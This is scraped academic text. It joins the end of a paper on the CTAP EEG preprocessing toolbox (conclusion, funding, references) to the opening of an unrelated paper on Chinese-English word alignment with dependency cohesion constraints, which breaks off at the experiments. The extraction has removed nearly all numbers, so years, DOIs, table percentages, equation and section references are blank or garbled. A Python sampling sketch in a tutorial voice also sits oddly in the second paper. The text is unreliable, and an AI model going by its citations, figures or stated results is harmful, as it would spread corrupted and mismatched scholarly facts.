meg certain physical properties of the system permit inference of sources even from very noisy data (taulu & hari, ) (although recording of clean data is always preferable, it is not always possible, e.g. with deep brain stimulation patients (airaksinen et al., )). while many publications have described methods for processing eeg for different purposes, such as removing artefacts, estimating signal sources, analysing erps and so on. however, despite the wealth of methodological work done, there is a lack of cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benchmarking or tools for comparison of such methods. the outcome is that the most reliable way to assess each method is to learn how it works, apply it and test the outcome on one’s own data: this is a highly time-consuming process which is hardly competitive with simply performing the bulk of preprocessing in a manual way, as seems to remain the gold standard. the effect of each method on the data is also not commonly characterised, such that methods to correct artefacts can often introduce noise to the data, especially where there was no artefact (false positives). thus, we also aim to enable testing and comparison of automated methods for preprocessing. this is still work in progress, as we are building an extension for ctap that improves testing and comparison of preprocessing methods by repeated analyses on synthetic data. 
this extension, tentatively titled handler for synthetic data and repeated analyses (hydra), will use synthetic data to generate ground-truth controlled tests of preprocessing methods. it will have capability to generate new synthetic data matching the parameters of the lab’s own data, and compare outcomes of methods applied to this data in a principled computational manner. this will allow experimenters to find good methods for their data, or developers to flexibly test and benchmark their novel methods. another desirable, though non-vital, future task is to expand the quality control output, to include functionality such as statistical testing of detected bad data, for the experimenter to make a more informed decision. although statistical testing is already implied in many methods of bad data detection, it is not visible to users. this will take the form of automated tools to compare output from two (or more) peeks, to help visualise changes in both baseline level and local wave forms. such aims naturally complement the work of others in the field, and it is hoped that opportunities arise to pool resources and develop better solutions by collaboration. conclusion the ultimate goal of ctap is to improve on typical ways of preprocessing high- dimensional eeg data through a structured framework for automation. we will meet this goal via the following three steps: (a) facilitate processing of large quantities of eeg data; (b) improve reliability and objectivity of such processing; (c) support development of smart algorithms to tune the thresholds of statistical selection methods (for bad channels, epochs, segments or components) to provide results which are robust enough to minimise manual intervention. we have now addressed aim (a), partly also (b) and laid the groundwork to continue developing solutions for (c). thus, the work described here provides the solid foundation needed to complete ctap, and thereby help to minimise human effort, subjectivity and error in eeg analysis; and facilitate easy, reliable batch-processing for experts and novices alike. acknowledgements the authors would like to thank andreas henelius, miika toivanen, kristian lukander and lauri ahonen for fruitful discussions on the ctap toolbox and this paper. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was partly supported by the revolution of knowledge work project no. / , funded by tekes—the finnish funding agency for technology and innovation. the funders had no role in study design, data collection and analysis, decision to publish or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: revolution of knowledge work project no. / , funded by tekes—the finnish funding agency for technology and innovation. competing interests the authors declare that they have no competing interests. author contributions � benjamin u. cowley conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � jussi korpela conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. 
� jari torniainen conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: https://github.com/bwrc/ctap. references agapov sn, bulanov va, zakharov av, sergeeva ms. . review of analytical instruments for eeg analysis. available at http://arxiv.org/abs/ . . airaksinen k, mäkelä jp, taulu s, ahonen a, nurminen j, schnitzler a, pekkonen e. . effects of dbs on auditory and somatosensory processing in parkinson’s disease. human brain mapping ( ): – doi . /hbm. . baillet s, friston k, oostenveld r. . academic software applications for electromagnetic brain mapping using meg and eeg. computational intelligence and neuroscience : – doi . / / . baillet s, tadel f, leahy rm, mosher jc, delorme a, makeig s, oostenveld r, hämäläinen m, dalal ss, zumer j, clerc m, wolters ch, kiebel s, jensen o. . academic software toolboxes for the analysis of meg data. berlin: springer, – [chapter academic s]. bao fs, liu x, zhang c. . pyeeg: an open source python module for eeg/meg feature extraction. computational intelligence and neuroscience : – doi . / / . cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/ctap http://arxiv.org/abs/ . http://dx.doi.org/ . /hbm. http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ barua s, begum s. . a review on machine learning algorithms in handling eeg artifacts. in: jensfelt p, ed. the swedish ai society (sais) workshop sais, , – may , stockholm, sweden. bellec p, lavoie-courchesne s, dickinson p, lerch jp, zijdenbos ap, evans ac. . the pipeline system for octave and matlab (psom): a lightweight scripting framework and execution engine for scientific workflows. frontiers in neuroinformatics : doi . /fninf. . . bigdely-shamlo n, mullen t, kothe c, su k-m, robbins ka. . the prep pipeline: standardized preprocessing for large-scale eeg analysis. frontiers in neuroinformatics : doi . /fninf. . . chaumon m, bishop dvm, busch na. . a practical guide to the selection of independent components of the electroencephalogram for artifact correction. journal of neuroscience methods : – doi . /j.jneumeth. . . . cowley b, filetti m, lukander k, torniainen j, henelius a, ahonen l, barral o, kosunen i, valtonen t, huotilainen m, ravaja n, jaccuci g. . the psychophysiology primer: a guide to methods and a broad review with a focus on human–computer interaction. foundations and trends in hci ( – ): – doi . / . dandekar s, ales j, carney t, klein sa. . methods for quantifying intra- and inter-subject variability of evoked potential data applied to the multifocal visual evoked potential. journal of neuroscience methods ( ): – doi . /j.jneumeth. . . . delorme a, makeig s. . eeglab: an open source toolbox for analysis of single-trial eeg dynamics including independent component analysis. journal of neuroscience methods ( ): – doi . /j.jneumeth. . . . delorme a, mullen t, kothe c, akalin acar z, bigdely-shamlo n, vankov a, makeig s. . eeglab, sift, nft, bcilab, and erica: new tools for advanced eeg processing. computational intelligence and neuroscience : – doi . / / . delorme a, palmer j, onton j, oostenveld r, makeig s. . independent eeg sources are dipolar. plos one ( ):e doi . /journal.pone. . delorme a, sejnowski t, makeig s. . 
enhanced detection of artifacts in eeg data using higher-order statistics and independent component analysis. neuroimage ( ): – doi . /j.neuroimage. . . . frank rm, frishkoff ga. . automated protocol for evaluation of electromagnetic component separation (apecs): application of a framework for evaluating statistical methods of blink extraction from multichannel eeg. clinical neurophysiology ( ): – doi . /j.clinph. . . . gramfort a, luessi m, larson e, engemann da, strohmeier d, brodbeck c, goj r, jas m, brooks t, parkkonen l, hämäläinen m. . meg and eeg data analysis with mne-python. frontiers in neuroscience : doi . /j.neuroimage. . . . keil a, debener s, gratton g, junghöfer m, kappenman es, luck sj, luu p, miller ga, yee cm. . committee report: publication guidelines and recommendations for studies using electroencephalography and magnetoencephalography. psychophysiology ( ): – doi . /psyp. . lindsen jp, bhattacharya j. . correction of blink artifacts using independent component analysis and empirical mode decomposition. psychophysiology ( ): – doi . /j. - . . .x. mognon a, jovicich j, bruzzone l, buiatti m. . adjust: an automatic eeg artifact detector based on the joint use of spatial and temporal features. psychophysiology ( ): – doi . /j. - . . .x. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.clinph. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /psyp. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nolan h, whelan r, reilly rb. . faster: fully automated statistical thresholding for eeg artifact rejection. journal of neuroscience methods ( ): – . oostenveld r, fries p, maris e, schoffelen j-m. . fieldtrip: open source software for advanced analysis of meg, eeg, and invasive electrophysiological data. computational intelligence and neuroscience : – doi . / / . ovaska k, laakso m, haapa-paananen s, louhimo r, chen p, aittomäki v, valo e, núñez-fontarnau j, rantanen v, karinen s, nousiainen k, lahesmaa-korpinen a-m, miettinen m, saarinen l, kohonen p, wu j, westermarck j, hautaniemi s. . large-scale data integration framework provides a comprehensive view on glioblastoma multiforme. genome medicine ( ): doi . /gm . peyk p, de cesarei a, junghöfer m. . electromagnetoencephalography software: overview and integration with other eeg/meg toolboxes. computational intelligence and neuroscience : – doi . / / . tadel f, baillet s, mosher jc, pantazis d, leahy rm. . brainstorm: a user-friendly application for meg/eeg analysis. computational intelligence and neuroscience : – doi . /conf.fnins. . . . taulu s, hari r. . removal of magnetoencephalographic artifacts with temporal signal-space separation: demonstration with single-trial auditory-evoked responses. human brain mapping ( ): – doi . /hbm. . toivanen m, pettersson k, lukander k. . a probabilistic real-time algorithm for detecting blinks, saccades, and fixations from eog data. journal of eye movement research ( ): – . tremblay a, newman aj. . modeling nonlinear relationships in erp data using mixed-effects regression with r examples. psychophysiology ( ): – doi . /psyp. . widmann a, schröger e. . 
filter effects and filter artifacts in the analysis of electrophysiological data. frontiers in psychology : doi . /fpsyg. . .

large-scale word alignment using soft dependency cohesion constraints
zhiguo wang and chengqing zong
national laboratory of pattern recognition, institute of automation, chinese academy of sciences
{zgwang, cqzong}@nlpr.ia.ac.cn

abstract
dependency cohesion refers to the observation that phrases dominated by disjoint dependency subtrees in the source language generally do not overlap in the target language. it has been verified to be a useful constraint for word alignment. however, previous work either treats this as a hard constraint or uses it as a feature in discriminative models, which is ineffective for large-scale tasks. in this paper, we take dependency cohesion as a soft constraint, and integrate it into a generative model for large-scale word alignment experiments. we also propose an approximate em algorithm and a gibbs sampling algorithm to estimate model parameters in an unsupervised manner. experiments on large-scale chinese-english translation tasks demonstrate that our model achieves improvements in both alignment quality and translation quality.

introduction
word alignment is the task of identifying word correspondences between parallel sentence pairs. word alignment has become a vital component of statistical machine translation (smt) systems, since it is required by almost all state-of-the-art smt systems for the purpose of extracting phrase tables or even syntactic transformation rules (koehn et al., ; galley et al., ). during the past two decades, generative word alignment models such as the ibm models (brown et al., ) and the hmm model (vogel et al., ) have been widely used, primarily because they are trained on bilingual sentences in an unsupervised manner and the implementation is freely available in the giza++ toolkit (och and ney, ). however, the word alignment quality of generative models is still far from satisfactory for smt systems. in recent years, discriminative alignment models incorporating linguistically motivated features have become increasingly popular (moore, ; taskar et al., ; riesa and marcu, ; saers et al., ; riesa et al., ). these models are usually trained with manually annotated parallel data. however, when moving to a new language pair, large amounts of hand-aligned data are usually unavailable and expensive to create. a more practical way to improve large-scale word alignment quality is to introduce syntactic knowledge into a generative model and train the model in an unsupervised manner (wu, ; yamada and knight, ; lopez and resnik, ; denero and klein, ; pauls et al., ). in this paper, we take dependency cohesion (fox, ) into account, which assumes phrases dominated by disjoint dependency subtrees tend not to overlap after translation.
instead of treating dependency cohesion as a hard constraint (lin and cherry, ) or using it as a feature in discriminative models (cherry and lin, b), we treat dependency cohesion as a distortion constraint, and integrate it into a modified hmm word alignment model to softly influence the probabilities of alignment candidates. we also propose an approximate em algorithm and an explicit gibbs sampling algorithm to train the model in an unsupervised manner. experiments on a large-scale chinese-english translation task demonstrate that our model achieves improvements in both word alignment quality and machine translation quality.

the remainder of this paper is organized as follows: section introduces the dependency cohesion constraint for word alignment. section presents our generative model for word alignment using the dependency cohesion constraint. section describes algorithms for parameter estimation. we discuss and analyze the experiments in section . section gives the related work. finally, we conclude this paper and mention future work in section .

dependency cohesion constraint for word alignment
given a source (foreign) sentence f_1^J = f_1, f_2, ..., f_J and a target (english) sentence e_1^I = e_1, e_2, ..., e_I, the alignment A between f_1^J and e_1^I is defined as a subset of the cartesian product of word positions:

A \subseteq \{ (j, i) : j = 1, ..., J; \; i = 1, ..., I \}

when given the source side dependency tree T, we can project dependency subtrees in T onto the target sentence through the alignment A. dependency cohesion assumes projection spans of disjoint subtrees tend not to overlap. let T(f_i) be the subtree of T rooted at f_i; we define two kinds of projection span for the node f_i: subtree span and head span. the subtree span is the projection span of the total subtree T(f_i), while the head span is the projection span of the node f_i itself. following fox ( ) and lin and cherry ( ), we consider two types of dependency cohesion: head-modifier cohesion and modifier-modifier cohesion. head-modifier cohesion means that the subtree span of a node does not overlap with the head span of its head (parent) node, while modifier-modifier cohesion means that the subtree spans of two nodes under the same head node do not overlap each other. we call a situation where cohesion is not maintained a crossing.

using the dependency tree in figure as an example, given the correct alignment "r", the subtree span of "有/have" is [ , ], and the head span of its head node "之一/one of" is [ , ]. they do not overlap each other, so the head-modifier cohesion is maintained. similarly, the subtree span of "少数/few" is [ , ], and it does not overlap the subtree span of "有/have", so a modifier-modifier cohesion is maintained. however, when "r" is replaced with the incorrect alignment "w", the subtree span of "有/have" becomes [ , ], and it overlaps the head span of its head "之一/one of", so a head-modifier crossing occurs. meanwhile, the subtree spans of the two nodes "有/have" and "少数/few" overlap each other, so a modifier-modifier crossing occurs.

fox ( ) showed that dependency cohesion is generally maintained between english and french. to test how well this assumption holds between chinese and english, we measure the dependency cohesion between the two languages with a manually annotated bilingual chinese-english data set of sentence pairs.
we use the head-modifier cohesion percentage (hcp) and the modifier-modifier cohesion percentage (mcp) to measure the degree of cohesion in the corpus. hcp (or mcp) measures how many head-modifier (or modifier-modifier) pairs are actually cohesive. table lists the relative percentages in both chinese-to-english (ch-en, using chinese side dependency trees) and english-to-chinese (en-ch, using english side dependency trees) directions. (the data set is the development set used in section .)

table : cohesion percentages (%) of a manually annotated data set between chinese and english. ch-en: hcp . , mcp . ; en-ch: hcp . , mcp . .

figure : a chinese-english sentence pair including the word alignments and the chinese side dependency tree. the chinese and english words are listed horizontally and vertically, respectively. the black grids are gold-standard alignments. for the chinese word "有/have", we give two alignment positions, where "r" is the correct alignment and "w" is the incorrect alignment. (chinese: 澳洲 是 与 北韩 有 邦交 的 少数 国家 之一 。 english: australia is one of the few countries that have diplomatic relations with north korea .)

as we see from table , dependency cohesion is generally maintained between chinese and english, so dependency cohesion would be helpful for word alignment between chinese and english. however, there are still a number of crossings. if we restrict the alignment space with a hard cohesion constraint, the correct alignments that result in crossings will be ruled out directly. in the next section, we describe an approach to integrating the dependency cohesion constraint into a generative model to softly influence the probabilities of alignment candidates. we show that our new approach addresses the shortcomings of using dependency cohesion as a hard constraint.

a generative word alignment model with dependency cohesion constraint
the most influential generative word alignment models are the ibm models 1-5 and the hmm model (brown et al., ; vogel et al., ; och and ney, ). these models can be classified into sequence-based models (ibm models 1, 2 and hmm) and fertility-based models (ibm models 3, 4 and 5). the sequence-based model is easier to implement, and recent experiments have shown that an appropriately modified sequence-based model can produce performance comparable with fertility-based models (lopez and resnik, ; liang et al., ; denero and klein, ; zhao and gildea, ; bansal et al., ). so we built a generative word alignment model with dependency cohesion constraint based on the sequence-based model.

the sequence-based alignment model
according to brown et al. ( ) and och and ney ( ), the sequence-based model is built as a noisy channel model, where the source sentence f_1^J and the alignment a_1^J are generated conditioning on the target sentence e_1^I. the model assumes each source word is assigned to exactly one target word, and defines an asymmetric alignment for the sentence pair as a_1^J = a_1, a_2, ..., a_j, ..., a_J, where each a_j \in [0, I] is an alignment from the source position j to the target position a_j, and a_j = 0 means f_j is not aligned with any target word. the sequence-based model divides the alignment procedure into two stages (distortion and translation) and factors as:

p(f_1^J, a_1^J \mid e_1^I) = \prod_{j=1}^{J} p_d(a_j \mid a_{j-1}, I) \, p_t(f_j \mid e_{a_j})    (1)

where p_d is the distortion model and p_t is the translation model. ibm models 1, 2 and the hmm model all assume the same translation model p_t(f_j \mid e_{a_j}); however, they use three different distortion models.
ibm model 1 assumes a uniform distortion probability 1/(I+1), ibm model 2 assumes p_d(a_j | j), which depends on the word position j, and the hmm model assumes p_d(a_j | a_{j-1}, I), which depends on the previous alignment a_{j-1}. recently, tree distance models (lopez and resnik, ; denero and klein, ) formulate the distortion model as p_d(a_j | a_{j-1}, T), where the distance between a_j and a_{j-1} is calculated by walking through the phrase (or dependency) tree T.

proposed model
to integrate the dependency cohesion constraint into a generative model, we refine the sequence-based model in two ways with the help of the source side dependency tree T_f. first, we design a new word alignment order. in the sequence-based model, source words are aligned from left to right by taking the source sentence as a linear sequence. however, to apply the dependency cohesion constraint, the subtree span of a head node is computed based on the alignments of its children, so children must be aligned before the head node. riesa and marcu ( ) propose a hierarchical search procedure to traverse all nodes in a phrase structure tree. similarly, we define a bottom-up topological order (but-order) to traverse all words in the source side dependency tree T_f. in the but-order, tree nodes are aligned bottom-up with T_f as a backbone. for all children under the same head node, left children are aligned from right to left, and then right children are aligned from left to right. for example, the but-order for the following dependency tree is "c b e f d a h g".

figure: an example dependency tree with nodes a-h.

for the sake of clarity, we define a function to map all nodes in T_f into their but-order, and notate it as BUT(T_f) = \pi_1, \pi_2, ..., \pi_j, ..., \pi_J, where \pi_j means that the j-th node in but-order is the \pi_j-th word in the original source sentence. we arrange the alignment sequence a_1^J according to the but-order and notate it as a_{[1,J]} = a_{\pi_1}, ..., a_{\pi_j}, ..., a_{\pi_J}, where a_{\pi_j} is the aligned position for node f_{\pi_j}. we also notate the sub-sequence a_{\pi_i}, ..., a_{\pi_j} as a_{[i,j]}.

second, we keep the same translation model as the sequence-based model and integrate the dependency cohesion constraints into the distortion model. the main idea is to influence the distortion procedure with the dependency cohesion constraints. assume node f_h and node f_m are a head-modifier pair in T_f, where f_h is the head and f_m is the modifier. the head-modifier cohesion relationship between them is notated as h_{h,m} \in {cohesion, crossing}: when the head-modifier cohesion is maintained h_{h,m} = cohesion, otherwise h_{h,m} = crossing. we represent the set of head-modifier cohesion relationships for all the head-modifier pairs in T_f as:

H = \{ h_{h,m} \mid h \in [1, J], m \in [1, J], h \neq m, f_h and f_m are a head-modifier pair in T_f \}

the set of head-modifier cohesion relationships for all the head-modifier pairs taking f_h as the head node can be represented as:

H_h = \{ h_{h,m} \mid m \in [1, J], m \neq h, f_h and f_m are a head-modifier pair in T_f \}

obviously, H = \bigcup_{h=1}^{J} H_h. similarly, we assume node f_k and node f_l are a modifier-modifier pair in T_f. to avoid repetition, we assume f_k is the node sitting at the position after f_l in but-order and call f_k the higher-order node of the pair. the modifier-modifier cohesion relationship between them is notated as m_{k,l} \in {cohesion, crossing}: when the modifier-modifier cohesion is maintained m_{k,l} = cohesion, otherwise m_{k,l} = crossing.
we represent the set of modifier-modifier cohesion relationships for all the modifier-modifier pairs in 𝑇𝑓 as: 𝑴 = {𝓂𝑘,𝑙 | 𝑘 ∈ [ , 𝐽], 𝑙 ∈ [ , 𝐽], 𝑘 ≠ 𝑙, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } the set of modifier-modifier cohesion relationships for all the modifier-modifier pairs taking 𝑓𝑘 as the higher-order node can be represented as: 𝓶𝑘 = {𝓂𝑘,𝑙 | 𝑙 ∈ [ , 𝐽], 𝑙 ≠ 𝑘, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } obviously, 𝑴 = ⋃ 𝓶𝑘 𝐽 𝑘= . with the above notations, we formulate the distortion probability for a node 𝑓𝜋𝑗 as 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]). according to eq. ( ) and the two improvements, we formulated our model as: 𝑝(𝒇 𝐽 , 𝒂[ ,𝐽]|𝒆 𝐼 , 𝑇𝑓 ) = 𝑝(𝒂[ ,𝐽], 𝑯, 𝑴, 𝒇 𝐽 , |𝒆 𝐼 , 𝑇𝑓 ) ≈ ∏ 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]) 𝑝𝑡 (𝑓𝜋𝑗 |𝑒𝑎𝜋𝑗 )𝜋𝑗∈𝐵𝑈𝑇(𝑇𝑓) ( ) here, we use the approximation symbol, because the right hand side is not guaranteed to be normalized. in practice, we only compute ratios of these terms, so it is not actually a problem. such model is called deficient (brown et al., ), and many successful unsupervised models are deficient, e.g., ibm model and ibm model . . dependency cohesive distortion model we assume the distortion procedure is influenced by three factors: words distance, head-modifier cohesion and modifier-modifier cohesion. therefore, we further decompose the distortion model 𝑝𝑑 into three terms as follows: 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]) = 𝑝 (𝑎𝜋𝑗 |𝒂[ ,𝑗− ]) 𝑝 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) 𝑝 (𝓶𝜋𝑗 |𝒂[ ,𝑗], 𝓱𝜋𝑗 ) ≈ 𝑝𝑤𝑑 (𝑎𝜋𝑗 |𝑎𝜋𝑗− , 𝐼) 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[ ,𝑗]) ( ) where 𝑝𝑤𝑑 is the words distance term, 𝑝ℎ𝑐 is the head-modifier cohesion term and 𝑝𝑚𝑐 is the modifier-modifier cohesion term. the word distance term 𝑝𝑤𝑑 has been verified to be very useful in the hmm alignment model. however, in our model, the word distance is calculated based on the previous node in but- order rather than the previous word in the original sentence. we follow the hmm word alignment model (vogel et al., ) and parameterize 𝑝𝑤𝑑 in terms of the jump width: 𝑝𝑤𝑑 (𝑖|𝑖 ′, 𝐼) = 𝑐(𝑖−𝑖′ ) ∑ 𝑐(𝑖′′ −𝑖′)𝑖′′ ( ) where 𝑐() is the count of jump width. the head-modifier cohesion term 𝑝ℎ𝑐 is used to penalize the distortion probability according to relationships between the head node and its children (modifiers). therefore, we define 𝑝ℎ𝑐 as the product of probabilities for all head-modifier pairs taking 𝑓𝜋𝑗 as head node: 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) = ∏ 𝑝ℎ (𝒽𝜋𝑗,𝑐 |𝑓𝑐 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑐 )𝒽𝜋𝑗,𝑐∈𝓱𝜋𝑗 ( ) where 𝒽𝜋𝑗,𝑐 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the head- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its child 𝑓𝑐 , 𝑝ℎ is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑐 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑐. similarly, the modifier-modifier cohesion term 𝑝𝑚𝑐 is used to penalize the distortion probability according to relationships between 𝑓𝜋𝑗 and its siblings. therefore, we define 𝑝𝑚𝑐 as the product of probabilities for all the modifier-modifier pairs taking 𝑓𝜋𝑗 as the higher-order node: 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[ ,𝑗] ) = ∏ 𝑝𝑚 (𝓂𝜋𝑗,𝑠 |𝑓𝑠 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑠 )𝓂𝜋𝑗,𝑠∈𝓶𝜋𝑗 ( ) where 𝓂𝜋𝑗,𝑠 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the modifier- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its sibling 𝑓𝑠 , 𝑝𝑚 is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑠 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑠. both 𝑝ℎ and 𝑝𝑚 in eq. ( ) and eq. ( ) are conditioned on three words, which would make them very sparse. to cope with this problem, we use the word clustering toolkit, mkcls (och et al., ), to cluster all words into classes, and replace the three words with their classes. parameter estimation to align sentence pairs with the model in eq. 
( ), we have to estimate some parameters: 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 . the traditional approach for sequence- based models uses expectation maximization (em) algorithm to estimate parameters. however, in our model, it is hard to find an efficient way to sum over all the possible alignments, which is required in the e-step of em algorithm. therefore, we propose an approximate em algorithm and a gibbs sampling algorithm for parameter estimation. . approximate em algorithm the approximate em algorithm is similar to the training algorithm for fertility-based alignment models (och and ney, ). the main idea is to enumerate only a small subset of good alignments in the e-step, then collect expectation counts and estimate parameters among the small subset in m- step. following with och and ney ( ), we employ neighbor alignments of the viterbi alignment as the small subset. neighbor alignments are obtained by performing one swap or move operation over the viterbi alignment. obtaining the viterbi alignment itself is not so easy for our model. therefore, we take the viterbi alignment of the sequence-based model (hmm model) as the starting point, and iterate the hill- climbing algorithm (brown et al., ) many times to get the best alignment greedily. in each iteration, we find the best alignment with eq. ( ) among neighbor alignments of the initial point, and then make the best alignment as the initial point for the next iteration. the algorithm iterates until no update could be made. . gibbs sampling algorithm gibbs sampling is another effective algorithm for unsupervised learning problems. as is described in the literatures (johnson et al., ; gao and johnson, ), there are two types of gibbs samplers: explicit and collapsed. an explicit sampler represents and samples the model parameters in addition to the word alignments, while in a collapsed sampler the parameters are integrated out and only alignments are sampled. mermer and saraçlar ( ) proposed a collapsed sampler for ibm model . however, their sampler updates parameters constantly and thus cannot run efficiently on large-scale tasks. instead, we take advantage of explicit gibbs sampling to make a highly parallelizable sampler. our gibbs sampler is similar to the mcmc algorithm in zhao and gildea ( ), but we assume dirichlet priors when sampling model parameters and take a different sampling approach based on the source side dependency tree. our sampler performs a sequence of consecutive iterations. each iteration consists of two sampling steps. the first step samples the aligned position for each dependency node according to the but- order. concretely, when sampling the aligned position 𝑎𝜋𝑗 (𝑡+ ) for node 𝑓𝜋𝑗 on iteration 𝑡+ , the aligned positions for 𝒂[ ,𝑗− ] are fixed on the new sampling results 𝒂[ ,𝑗− ] (𝑡+ ) on iteration 𝑡 + , and the aligned positions for 𝒂[𝑗+ ,𝐽] are fixed on the old sampling results 𝒂[𝑗+ ,𝐽] (𝑡) on iteration 𝑡 . therefore, we sample the aligned position 𝑎𝜋𝑗 (𝑡+ ) as follows: 𝑎𝜋𝑗 (𝑡+ ) ~ 𝑝 (𝑎𝜋𝑗 |𝒂[ ,𝑗− ] (𝑡+ ) , 𝒂[𝑗+ ,𝐽] (𝑡) , 𝑓 𝐽 , 𝑒 𝐼 ) = 𝑝 (𝒇 𝐽 , �̂�𝑎𝜋𝑗 |𝒆 𝐼 ) ∑ 𝑝 (𝒇 𝐽 , �̂�𝑎𝜋𝑗 |𝒆 𝐼 )𝑎𝜋𝑗 ∈{ , ,…,𝐼} ( ) where �̂�𝑎𝜋𝑗 = 𝒂 [ ,𝑗− ] (𝑡+ ) ∪ 𝑎𝜋𝑗 ∪ 𝒂[𝑗+ ,𝐽] (𝑡) , the numerator is the probability of aligning 𝑓𝜋𝑗 with 𝑒𝑎𝜋𝑗 (the alignments for other nodes are fixed at 𝒂[ ,𝑗− ] (𝑡+ ) and 𝒂[𝑗+ ,𝐽] (𝑡) ) calculated with eq. ( ), and the denominator is the summation of the probabilities of aligning 𝑓𝜋𝑗 with each target word. 
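to make the first sampling step concrete, here is a minimal python sketch of one gibbs sweep over the but-order, resampling each aligned position from its conditional distribution with all other links fixed. the `log_score` callable is an assumption standing in for an implementation of the full model probability; a practical sampler would only recompute the factors touched by the changed link rather than rescoring the whole sentence, and it would collect the counts needed for the second step during this sweep.

```python
import math
import random

def gibbs_sweep(num_target_words, but_order, alignment, log_score, rng=random):
    """one pass of the first sampling step: resample every link in but-order.

    num_target_words : I, the length of the target sentence
    but_order        : source positions (1-based) in bottom-up topological order
    alignment        : dict {source position: target position}, 0 = null word;
                       updated in place
    log_score        : callable(alignment) -> log p(f, a | e, T_f); an assumed
                       stand-in for an implementation of the full model
    """
    for j in but_order:
        log_probs = []
        for cand in range(num_target_words + 1):      # candidate positions incl. null (0)
            alignment[j] = cand
            log_probs.append(log_score(alignment))
        # normalise in log space and sample a_j from the resulting distribution
        m = max(log_probs)
        weights = [math.exp(lp - m) for lp in log_probs]
        total = sum(weights)
        r, acc = rng.random() * total, 0.0
        for cand, w in enumerate(weights):
            acc += w
            if r <= acc:
                alignment[j] = cand
                break
    return alignment
```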
the second step of our sampler calculates parameters 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 using their counts, where all these counts can be easily collected during the first sampling step. because all these parameters follow multinomial distributions, we consider dirichlet priors for them, which would greatly simplify the inference procedure. in the first sampling step, all the sentence pairs are processed independently. so we can make this step parallel and process all the sentence pairs efficiently with multi-threads. when using the gibbs sampler for decoding, we just ignore the second sampling step and iterate the first sampling step many times. experiments we performed a series of experiments to evaluate our model. all the experiments are conducted on the chinese-english language pair. we employ two training sets: fbis and large. the size and source corpus of these training sets are listed in table . we will use the smaller training set fbis to evaluate the characters of our model and use the large training set to evaluate whether our model is adaptable for large-scale task. for word alignment quality evaluation, we take the hand- aligned data sets from ssmt , which contains http://nlp.ict.ac.cn/guidelines/guidelines- - ssmt(english).doc sentence pairs in the testing set and sentence pairs in the development set. following och and ney ( ), we evaluate word alignment quality with the alignment error rate (aer), where lower aer is better. because our model takes dependency trees as input, we parse both sides of the two training sets, the development set and the testing set with berkeley parser (petrov et al., ), and then convert the generated phrase trees into dependency trees according to wang and zong ( ; ). our model is an asymmetric model, so we perform word alignment in both forward (chineseenglish) and reverse (englishchinese) directions. . effectiveness of cohesion constraints in eq. ( ), the distortion probability 𝑝𝑑 is decomposed into three terms: 𝑝𝑤𝑑 , 𝑝ℎ𝑐 and 𝑝𝑚𝑐 . to study whether cohesion constraints are effective for word alignment, we construct four sub-models as follows: ( ) wd: 𝑝𝑑 = 𝑝𝑤𝑑; ( ) wd-hc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐; ( ) wd-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝𝑚𝑐; ( ) wd-hc-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐 ∙ 𝑝𝑚𝑐. we train these four models with the approximate em and the gibbs sampling 